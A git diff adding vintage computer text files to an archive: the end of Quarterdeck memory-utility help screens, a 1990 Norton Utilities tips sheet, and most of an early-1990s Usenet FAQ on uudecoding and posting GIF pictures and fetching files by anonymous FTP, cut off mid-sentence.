/BESTFIT Load into the block that fits best º + º /HAPPIEST Load until the program is happy º + º /REGION:n Load into region number n º + º /LARGEST[:n] Load into the nth largest block º + º /SMALLEST[:n] Load into the nth smallest block º + º /EXCLUDEREGION:n Don't load into region number n º + º /EXCLUDELARGEST[:n] Don't load into the nth largest block º + º /EXCLUDESMALLEST[:n] Don't load into the nth smallest block º + º /GETSIZE[:f] Load low and calculate size º + º Store result in file f º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º LOADHI º + º Copyright (c) 1988-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º /SIZE:nnnnn Load into a block nnnnn big º + º /LABEL:abc Display a label with /GS data º + º /NOLO Don't load low º + º /LO Load low º + º /TERMINATERESIDENT TSR on exit º + º /NOPAUSEONERROR Don't pause on error º + º /PAUSE Pause while parsing commands º + º /HELP Display this help text º + º /? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +From LOADHI.SYS + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º LOADHI º + º Copyright (c) 1988-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º LOADHI loads drivers into high RAM º + º º + º Syntax: º + º DEVICE=LOADHI.SYS [switches] driver-name [driver-switches] º + º º + º LOADHI switches: º + º /BESTFIT Load into the block that fits best º + º /HAPPIEST Load until the program is happy º + º /REGION:n Load into region number n º + º /LARGEST[:n] Load into the nth largest block º + º /SMALLEST[:n] Load into the nth smallest block º + º /EXCLUDEREGION:n Don't load into region number n º + º /EXCLUDELARGEST[:n] Don't load into the nth largest block º + º /EXCLUDESMALLEST[:n] Don't load into the nth smallest block º + º /GETSIZE[:f] Load low and calculate size º + º Store result in file f º + º /SIZE:nnnnn Load into a block nnnnn big º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º LOADHI º + º Copyright (c) 1988-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º /LABEL:abc Display a label with /GS data º + º /NOLO Don't load low º + º /LO Load low º + º /NOPAUSEONERROR Don't pause on error º + º /PAUSE Pause while parsing commands º + º /HELP Display this help text º + º /? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º FILES º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º FILES displays and increases the maximum number of º + º DOS file handles º + º º + º Syntax: º + º FILES [param] º + º FILES with no parameter shows the current amount º + º º + º FILES parameters º + º num Set the number of file handles º + º =num Set the number of file handles º + º +num Increase the number of file handles by num º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º FCBS º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º FCBS displays and increases the number of º + º DOS FCB handles º + º º + º Syntax: º + º FCBS [param] º + º FCBS with no parameter shows the current amount º + º º + º FCBS parameters º + º num Set the number of FCBs º + º ,num Set the number of protected FCBs º + º num1,num2 Set both FCBS and protected FCBS º + º +num Increase the number of FCBs º + º +,num Increase the number of protected FCBs º + º +num1,num2 Increase both FCBs and protected FCBs º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º FCBS º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º BUFFERS º + º Copyright (c) 1988-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º BUFFERS displays and increases the number of º + º DOS buffers º + º º + º Syntax: º + º BUFFERS [param] º + º BUFFERS with no parameter shows the current amount º + º º + º BUFFERS parameters º + º num Set the number of buffers º + º =num Set the number of buffers º + º +num Increase the number of buffers by num º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º VIDRAM º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º VIDRAM grows conventional memory on an EGA or VGA º + º º + º Syntax: º + º VIDRAM [switches] º + º VIDRAM with no switches displays status º + º º + º VIDRAM switches: º + º EGA Use EGA memory to turn on º + º EMS Use EMS memory to turn on (default) º + º NOCGA Inhibit EGA and CGA graphics º + º NOEGA Inhibit EGA graphics only º + º OFF Set up normal video memory with graphics º + º ON Grow memory into video region º + º OVERRIDE Allow video memory conflict º + º RESIDENT Just go resident º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º VIDRAM º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º HELP Display this help text º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º OPTIMIZE º + º Copyright (c) 1989 º + º Quarterdeck Office Systems, Inc. º + º º + º OPTIMIZE calculates and analyzes the sizes of your º + º TSRs and device drivers, and the sizes of the areas º + º of high RAM, and determines the optimal way to fit º + º the programs in memory so that as much memory as º + º possible is left below 640K. º + º º + º Syntax: º + º OPTIMIZE [switches] [filename] º + º OPTIMIZE with a filename processes that file º + º º + º OPTIMIZE switches: º + º /BOOT:l Specify boot drive letter º + º /PATH Add optimize path to path statements º + º /EMM:fname Specify own QEMM type driver º + º /LOADHIONLY Only modify lines which already have LOADHI º + º /NOPAUSEONERROR Don't pause on error º + º /PAUSE Pause while parsing commands º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º OPTIMIZE º + º Copyright (c) 1989 º + º Quarterdeck Office Systems, Inc. º + º º + º /HELP Display this help text º + º /? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + Copyright (C) 1990 by Quarterdeck Office Systems + * * * E N D O F F I L E * * * + \ No newline at end of file diff --git a/textfiles.com/computers/alsnutt1 b/textfiles.com/computers/alsnutt1 new file mode 100644 index 00000000..f47bf2bf --- /dev/null +++ b/textfiles.com/computers/alsnutt1 @@ -0,0 +1,61 @@ +BIG AL'S NORTON UTIL TECH TIPS VOLUME 1 NUMBER 1 (ALSNUTT1) + +(C) Copyright 1990 by Al Hansen All Rights Reserved + +This first issue of ALSNUTT is issued to the Public Domain and +may be freely copied and distributed as long as the above copyright +notice remains intact. + +If you wish to comment on this volume or add to future issues +please do so. You may contact me via Exec-PC the home of +ALSNUTT at 414/789-4210. I'm in the Exec-PC Message. +(Exec-PC Main Menu chain command ;M;I;B;S;;ALSNUTT ) + + +NU 5.0 FILEFIND TIP + +Are you tired of FILEFIND searching each matching file on your +disk for a text string when all you really wanted was to limit +the seach to the matching files in the directory you were in at +the moment? If you can't always remember the command line switches +here's a simple little batch file called LF.BAT (for 'local find'): + +FF .\%1 %2 %3 %4 %5 %6 %7 %8 %9 ;For example: LF yourtext + +Place it in your path. Simple and more intuitive than remembering +to type ".\*.*" or "/C". + + +SYSTEM SHUT-DOWN TIP + +Here's another slick little batch file that will give your hard disk +a quick once over and defrag it before you shut-down for the day. +As an option you could add a disk park program of your choice. + +QUIT.BAT + +NDD C: /QUICK ;Norton Disk Doctor /QUICK=just test system area +SD C: /U /A /V ;Speed Disk /U=update /A=all /V=volume +PARK ;Use any 'park' utility on hard disk + ;shut power off + +If you have multiple partitions on your hard disk be sure to add the +same commands for each drive. + + +NORTON COMMANDER 3.0 ZIP VIEWER + +Norton Commander 3.0 has the capabilty to view many major file formats +except .ZIP files. Future versions are rumoured to have this capability. +For now you could try the following: + +1. Edit (or create) your NC.EXT file to include: + ZIP: PKUNZIP -V !.! ;allows you to 'view' the contents +2. Park your cursor on the zip file and press Enter +3. Use the NC command CTRL-E to actually unzip the file after 'viewing' + edit out the '-V' option and press Enter again to unzip + + +ALSNUTT by Al Hansen +Exec-PC +1/1/91 diff --git a/textfiles.com/computers/alt-bin.txt b/textfiles.com/computers/alt-bin.txt new file mode 100644 index 00000000..d54689bf --- /dev/null +++ b/textfiles.com/computers/alt-bin.txt @@ -0,0 +1,1021 @@ +Notes on UUDECODEing .GIF pics etc. + +This file is intended to be a general introduction to the group +alt.binaries.pictures, answering some common questions concerning pictures +posted here, namely how to decode and view them. It is not, of +course, possible to cover everything, but I will try to to get as much +as I can into this file. If you feel something important has been +omitted and you know the subject well, please write me so I can +include the info for future releases. I can be contacted via +internet at readdm@ccwf.cc.utexas.edu. + +Before you miss an important detail contained in this file, let me +"pre-repeat" that I have tried to make *all* programs mentioned in +this document available for anonymous ftp at bongo.cc.utexas.edu +(128.83.186.13), in the gifstuff directory. If you think I've omitted +something important in the viewers-only archive, feel free to let me +know. Also: there are NO GIF files of any kind at this site! Save +your time and don't bother looking for them! + +Ok...on to the real reason you're reading this document... + + +TABLE OF CONTENTS + I. DOWNLOADING AND DECODING FILES + II. .GIF FILES AND .GIF VIEWERS + III. .GL FILES + IV. OTHER PICTURE TYPES + V. ENCODING AND UPLOADING FILES + VI. ALTERNATE SOURCES FOR PICTURES + VII. A.B.P. and A.B.P.D. +VIII. COMMON PROBLEMS + IX. APPENDICES: AWK, SED, & PERL SCRIPTS + +I. DOWNLOADING AND DECODING FILES + +By far the most common method of posting files to alt.binaries.pictures is +the UUENCODE standard. This program, shipped standard with most +implementations of UNIX, converts binary files into plain-text ASCII +files which can be handled by the mail system. You will need a +version of UUDECODE before anything else in order to view anything +downloaded from the net. If your system does not have a version of +UUDECODE available, you can get one via anonymous ftp from +bongo.cc.utexas.edu (128.83.186.13), in the gifstuff/uuxfer directory. + +The first step is to save the file you want to view...in most versions +of the newsreader, this is done by pressing s followed immediately (no +spaces) [NOTE: my rn will allow spaces, though-SQ] by a file name. +You will usually be asked if you want to save it in mailbox format; +you should answer 'n'. + +In the case of a single-part file, you can now uudecode the file, +which will create whatever output file is encoded. You can usually +tell if it's a single-part file by looking on the subject line; +standard nettiquette is to make somthing like (03/06) part of the +subjet line, which indicates you're on part 3 of a 6-part file. If no +numbers are there, you can usually assume it is a 1-part file. If +not, feel free to write the poster (directly...please don't waste +bandwidth by posting) and request that he/she put this info in the +subject line. Be nice about it! + +For multi-part files, life is a little more difficult. If all you +have is a standard UUDECODE program, you will need to trim the headers +and trailers from all of the parts and concatenate the resulting files +together to make one big file, and then run that through UUDECODE. +Use your favorite text editor to strip the headers & trailers of each +file. Then (on UNIX systems) use + cat part1 part2 part3 ... partN | uudecode +to concatenate them and pipe them through uudecode. +If you downloaded the files to an MS-DOS system before concatenating +them, use + copy part1 + part2 + part3 + ... + partN file +to concatenate them. + +There are several versions of UUDECODE out there that will do all of +this for you, including UUEXE (an MS-DOS program written by Richard +Marks) and my own UUXFER program. + +Several people have written scripts in AWK, SED, or PERL which will strip +headers & trailers, concatenate the results and pipe them through +UUDECODE. See section IX. (Appendix) if you want to run one of these. + +If you're going to download it to a home machine, or move it around a +network, remember that most outputs are going to be BINARY files, so +set your transfer protocol accordingly. + + +II. .GIF FILES AND GIF VIEWERS + +Ok. Now you've got this great GIF file from downloading it and +running it through UUDECODE. What is it, and what do you do with it? + +GIF stands for Graphic Interchange Format, and is a standard format +for images that was developed by Compuserve to be a device-independent +method of storing pictures. It includes Lempel-Ziv-Welch (LZW) +compression, which makes the files fairly small. + +You will need a GIF viewer in order to view the file. On X-Windows +workstations the program you need is called xloadimage. If your +system does not have xloadimage, you can get it via anonymous ftp +from bongo.cc.utexas.edu in the gifstuff/xwindows/xloadimage directory. +[NOTE: There are some other good ones there too, like xv and xshowgif.-SQ] + +On the Macintosh, a good one is QuickGIF, but it only runs on color +Macs. If you have a monochrome Mac, you can use VisionLab. +On MS-DOS systems, I personally use VPIC, but there exist +others, including CSHOW. A nice bonus to using CSHOW is that it can +also view several other common picture formats, including MacPAINT +images. Amiga users tell me that VirtGIF will display .GIF files +directly, but that Hamsharp or GIFMachine will convert .GIF +files to other formats, the principle benefit being that the other +formats allow more than 256 colors to be displayed simultaneously. + +Other machines: On Sun workstations running SunView, Alan Sparks has +made his 'artshow' program available, at the same archive mentioned +earlier, at ix1.cc.utexas.edu and bongo at the same address. + +For the Atari ST, there exist several shareware or PD programs, including +BGIF & GIFSPEC, which will convert the GIF files to the Spectrum file type, +which can then be viewed with other software (sorry, I don't know what it's +called). Finally, Apple ][+/e/c types are advised to use IIGIF to view gif +files on these computers, while the advice from a ][GS user is to use +SHRConvert. + +I have tried to make all of the above-mentioned GIF viewers available +from bongo.cc.utexas.edu, in the gifstuff directory. Hunt through the +0filelist file to see if something you need is available. + +Other systems have other viewers. Consult your sysytem administrator +or a local users group for your machine before you post to the asking +if there is a GIF viewer for your specific machine. + + +III. .GL FILES + +Commonly people post files to the net with a .GL extension. These +files are actually animated picture-shows that can be viewed on IBM-PC +machines with the GRASPRT program. The GRASP (GRAphics System for +Professionals) system was developed by Paul Mace as a PAY-WARE system +for transmitting these animated files. The GRASPRT program (public +domain, I believe) is a run-time version for viewing the files. + +Unfortunately, GRASPRT exists only for the PC-Clone family. Recently +some wonderful net-people have written an X windows-based .GL viewer +called xgl (there is also another called xgrasp, but I know little +about it). The source is available from export.lcs.mit.edu...look +in the directory where they keep contributed X code. I will also +endeavor to maintain a copy on bongo.cc.utexas.edu, but I can't promise +that it will be up-to-date. Recently an Amiga version was written... +you can find it in the amiga directory at bongo. + +There is another twist to GRASPRT. An older version admitted only CGA +monitors, but a newer one allows VGA as well. Unfortunately, the +older version doesn't even *recognize* the VGA standard, while the +newer version (which, BTW, is *much* faster than the old one) will not +let you display the VGA GRASP files on a CGA or EGA monitor. Unlike +the .GIF standard, .GL files are not resoultion-independent! + +Anyway, if you have a system other than a PC-Clone, an X system, or an +Amiga, I'm afraid you may be out of luck. Sorry! + +Usually, .GL files are huge, so people often compress them with one of +several popular compression/archiving packages. Perhaps the most +common is the PC family's PKZIP package. If a .GL file is posted with +a .ZIP extension, you know it's been ZIP'ed. Similarly, if it has a +.Z extension, it's been compressed with the UNIX `compress' utility. +If you encounter a file which has been ZIPed, and you have a PC, you +should go find a copy of PKUNZIP (simtel has one). If you *don't* +have a PC, you can get C source code for an UNZIPer from simtel, in +pd1: as unzip.tar-z (you'll have to decompress this +with the UNIX compress utility). + +If the file has been compressed with the UNIX compress utility, and +you're on a UNIX box, clearly you have no problem. If, on the other +hand, you're on some other box, you'll need a de-compressor. You can +find an msdos version of unix compress can be obtained from simtel in +pd1: or wuarchive.wustl.edu in /mirrors/msdos/sq-usq as the +file comp430d.zip. + + +IV. OTHER PICTURE TYPES + +There are other types of single-picture files posted to the net, +although they are not as common as the .GIF files. I suppose that the +next most common type of picture posted is the MacPaint picture. +These pictures, once decoded, are viewable on the Macintosh with the +standard MacPaint program. On the PC-Clone family, the pictures are +viewable with (among other progams) CSHOW. Other than the difference +in the viewing software, the downloading/decoding and encoding/uploading +procedures are identical as for other types of pictures. + +Another common form for pictures to take is the .IFF file, which is a +standard for pictures on the Amiga. I do not know of many programs for +computers other than the Amiga which allow viewing of these files, but +there exist some programs on the Amiga which will convert .IFF files +to .GIF files so the rest of us can see them. It has been pointed out +to me that DeluxePaint on the IBM-PC family will work with .IFF files, +but I have not verified this. + +Occasionally people get into an argument about which standard is best. +I think the answer is: WHO CARES?!? The only thing I have to say +about this matter is that almost every machine under the sun already +has a program written for it to view .GIF files, and if yours doesn't, +shareware or PD source code is available almost everywhere. + + +V. ENCODING AND UPLOADING FILES + +A common question that is asked is this one: what should I post to the +net? The basic answer is: anything you'd like to see here yourself! + +Before I get into the nitty-gritty of how to post, I should say +a few things about the loose etiquette of posting. + +[NOTE: this paragraph is more specific to alt.sex.pictures but still relevant] +The first thing is this: it's probably best to restrict yourself to +one or two images per day. I know you've got 600 MB of XXX-rated GIF +files of your girlfriend engaged in various acts with yourself and a +host of small furry animals that you're dying to distribute all over +the world. However, the net gets severely loaded down by these images, +since they are typically 100 - 300 Kb each. When you post ten of +them at once, lots of people will be frantically downloading them, +which shows up in the weekly Arbitron ratings when alt.sex.pictures +accounts for something like 50% of the entire net traffic, and 75% of +the alt.* traffic. We need to be self-policing if a.s.p is going to +avoid being axed by nervous sysadmins. + + +Second, be sure to give subject lines that are informative, like: + CRASH&BURN.GIF: Plane crash at an air show, 800x600x256 (02/08) +Notice that it includes everything: the file name, a short +description, the resolution, and what part of how many this one is. +If you insist on leaving everything *else* out, at least say which +part it is! + +Third, in the actual message you're posting, be sure to give at least +a brief description of what's in it, like: + + CRASH&BURN.GIF 800x600x256 (in 8 parts) + + This is 15th in the series of this plane crash at the Beruit Air Show + taken at every single conveivable angle. This one was taken from a + photograph by a guy who happened to be standing directly under the + plane as it came down. Pulitzer Prize material. At least the camera + was saved. + +Also, checksums are nice, for people with access to sum programs. It +helps people indentify erroneous transmissions. Usually people say +things like + + Checksums: (obtained with 4.2 BSD 'sum' or SysV 'sum -r') + between 'CUT HERE lines': + part 1: 76663 9082 + part 2: 78973 1234 + etc... + +Finally, if you got the file from some FTP site that was announced +over the net, don't bother posting it. 5-to-1 odds say that everyone +and his dog already have it, and we *really* need to be careful about +wasting bandwidth! If you're unsure of whether there's any interest +in it, just post a short message saying: "I have this file. Mail me +if you want a copy." If 500 people say they want one, post it...if +only one bozo from outer mongolia wants it, it's a sure bet that the +picture has already made the rounds! + +Ok...on to the how-to's of posting. + +First things first: if you have a GIF file, don't bother trying to +run some compression routine on it...it *won't* work. LZW compression +(the kind used in GIF files) is a very efficient compression scheme, +and happens to be the one used in many common compression routines +(including the standard UNIX `compress' utility!). If you try to compress +a GIF file, it will usually just end up getting bigger. + +Ok. You need to UUENCODE the file. Find an encoder and encode it! +If the output file is particularly large (i.e. more than 60 kB), it +would be wise to split up the encoded file into smaller parts (< 60 kB) +and then post those. You can split the file with a text editor if you +like, or...use Richard Marks' UUEXE or my UUXFER programs, which will +do that for you. + +If you do post a multi-part file, be sure to add lines before and +after the data that say 'CUT HERE' so that people trimming the headers +& trailers by hand know where to cut. A recent addition to the +etiquette also has you make the lines say 'BEGIN-----Cut Here' and +'END-----Cut Here' at the obvious locations, so that simple AWK and +PERL scripts can handle multi-part files. Another nice thing to do is +to put the part (02/06) numbers in each file. Again, the afore- +mentioned 'super' uuencode programs will do most of this for you. It +is important to make the "Cut Here" parts in mixed-case or lower-case +letters; some decoders detect data based on the presence of characters +which belong in the normal uuencoding character set, and they will +choke on lines which are all upper-case, since these lines contain +only characters which belong in the set. If you mix the cases, these +decoders will do fine...Remember (if you add "BEGIN" and "END" +keywords) to make "BEGIN" and "END" all caps so exsting scripts won't +miss them, and so uudecoders won't choke on them. + +Now post the files...and remember to include the neat info mentioned +earlier, like subject lines that mean something, descriptions, +checksums, etc... One thing that has been pointed out to me recently +is that certain newsreaders (NN, for example) sort the articles +alphabetically by title, so subject lines with part numbers get +displayed & saved in order. There is an obvious (and common) way to +torpedo this process: make subject lines which do not follow sequentially. + +An example: + first article's subject: "plane crash GIF: CRASH&BURN (part 1 / 4)" + subsequent articles' subjects: "CRASH&BURN (part N / 4)" +These subject lines will not be displayed & sorted correctly by NN. + +However, if you change the arrangement a little, like this: + first article's subject: "CRASH&BURN (part 1/4) plane crash GIF" + subsequent articles' subjects: "CRASH&BURN (part N/4)" +you will please NN-users the world over. + +That's about it for posting! + + +VI. ALTERNATE SOURCES FOR PICTURES + + +Alt.binaries.pictures is certainly not the only source for pictures, nor +are .GIF files the only types available (see section IV.). The most +likely place you are to find other pictures is in an archive that is +reachable via FTP. FTP stands for File Transfer Protocol, and is a +program for transmitting files over the network. To use FTP, you will +need access to a computer with the FTP program, and a network +connection. + +Most ftp programs will allow you to enter something like + ftp wsmr-simtel20.army.mil +which will connect you with the mighty SIMTEL-20 archives at the White +Sands Missile Range. Occasionally, you will encounter an ftp program +that is old enough or slothful enough that it does not recognize +internet-style addresses like the one above. In that case, you'll +need to know the computer's numeric address; for SIMTEL-20 +you would enter + ftp 192.88.110.20 + +Once you're connected, you'll have to tell the computer at the other +end that you want to log in, by entering USER (some machines save you +this step by *assuming* you want to log in. What else would you want +to do?) When you are prompted for an account name, enter + anonymous +When it asks you for a password, enter *your* internet address. + +Often the machine to which you are trying to connect will be busy +(i.e. too many anonymous users), in which case the machine will inform +you of this and throw you off. Try again later. + +Now you're in. What do you do? Well, you need to know where the +files are stored that you want. If you know this, just + cd directory-name +to the directory in question. Then you can do a DIR to find out +what is in it. + +So you see a file called CRASH&BURN.GIF and you want it for yourself. +What do you do? Well, the first thing is to tell the computer on the +other end that you want it to transmit a binary file. On most FTP +servers, entering the magic word TENEX will do this. If the machine +doesn't recognize TENEX, try BINARY, or if all else fails, you can +enter + TYPE L 8 +Be sure to do this for .GIF files or you'll get garbage when you try +to view them! + +Now you're ready to grab the files you want. You have two options: +you can type + get filename +or + mget wildcard +where wildcard is any UNIX-style wildcard. MGET will get all files +that satisfy the specification. + +When you're done grabbing files, type QUIT or BYE to log off the remote +machine and return to yours. + +A word about anonymous FTP and .GIF files. When you log onto a remote +machine via anonymous FTP, please try to restrict yourself to no more +then ten minutes of transmission time, or about five to ten files. As +you can imagine, when people discover a new archive of .GIF files, +they are all hot to download every one they can, and often they jam up +the site for *days* You'll notice this effect the first time some +bozo announces the name of a new .GIF archive. You won't be able to +get through without persistent efforts over several hours or even a +day or two. Then the system administrators of that site notice that +they have had about $5,000 worth of anonymous FTP over the last two +days, and revoke the anonymous FTP privilege. Now every one is +screwed. + +Be considerate; grab only a few files and then let someone else have a +chance. This probably won't solve the problem in the long term (still +everyone and his dog will be ftp'ing into that machine), but at least +it will spread the wealth a bit. + +A raging debate erupts on alt.sex.pictures every few weeks concerning +whether to announce new anonymous FTP sites for GIF files, and the +issue has never been settled to everyone's satisfaction. Here I add +my two cents to the discussion: if you discover a site and keep the +name to yourself or pass it on to only a few friends, then the word +will spread slowly, and the site will not have to bear an instantly +heavy load. However, if you announce to the world that you have found +this site, then everyone will descend upon it like a flock of vultures +on a rotting cow, and the site will invariably remove its GIF files. +Which sounds like a better idea to you? + +The other most common method for obtaining files is from an archival +file server. Most of these work in the following way: you send mail +to the server's address, with one-line commands in your message, like + help + directory \pictures\gif\family-oriented + send \pictures\gif\family-oriented\CRASH&BURN.GIF +and the requested info is sent back to you at some later time, when +the server has time to get around to it. + +The first step when you discover a server system is to send a HELP +command so you can learn what the commands are for that server. +However, most servers operate with commands basically similar to those +listed above. + + +VII. ALT.BINARIES.PICTURES AND ALT.BINARIES.PICTURES.D + +These two newsgroups work basically like the comp.binaries.ibm.pc and +c.b.i.p.d groups; one is for posting new material, and one is for +discussing posts and other issues. + +The basic idea is this: if it is a picture, post it to a.b.p. If it +is *ANYTHING ELSE* ANYTHING ANYTHING ANYTHING ELSE, post it to a.b.p.d +The truth is that I feel bad about posting *THIS FILE* to a.b.p, +because it is not a picture. However, the benefits of restricting the +requests for info outweigh the detriment of breaking the until- +recently-unwritten rule. + +PLEASE DO NOT POST ANYTHING TO ALT.BINARIES.PICTURES THAT IS NOT A PICTURE +OF SOME SORT!!!! + + +VIII. COMMON PROBLEMS + +Well, you've downloaded the file, tried to view it, and got garbage. +What went wrong? + +The two most likely places for something to go wrong are both in the +transmission of the file. The first is this: when you downloaded the +file to your home computer, did you remember to tell the modem- +transfer software that you're sending a binary file? + +The second-most likely is that you forgot to say TENEX before you +grabbed the file via FTP. + +Either of these will result in mangled files that are unviewable by +anything known to man. + +Also: did you remember to trim off the header & trailer information if +you are/were using a "simple" uudecoder? The symptom of forgetting to +do this is usually a message something like "short file" from your GIF +viewer. +[NOTE: I have also seen a problem where blank lines are left between +parts (or anywhere for that matter) within the 'begin' and 'end' lines +of the uuencoded file. Uudecode will get through them fine, but some +GIF viewers will choke on the results. The only blank line I've seen +get by is the one just before the 'end' statement. Beware of taking +too much or not enough off of the headers and trailers.-SQ] + +Another common problem is this one: IBM mainframes often use the +EBCDIC character set instead of the ASCII set used by everyone else. +This wouldn't be a problem except that most ASCII-EBCDIC converters +have a bug which mungs the translation of several characters, +including ^ { } and a few others. Even this wouldn't be a problem +except that the particular munging it does is to map several of these +characters onto the *same* wrong character. Ooops. + +The way around this is not to use uuencode to transfer these files, +but to use xx-encode, which produces files which look almost exactly +like uu-encoded files, but they use a character set which is +IBM-proof. If you are using an IBM mainframe as your host computer +and you're having trouble decoding files, this is most likely your +problem. Solution: 1) find a kind soul who is willing to uudecode the +files, xxencode them and send them to you, 2) get the files via FTP, +which should be EBCDIC-proof, or 3) get a better computer that uses +everybody else's character set. :-) + +The last and least likely problem is that some mailer somewhere +actually munged the 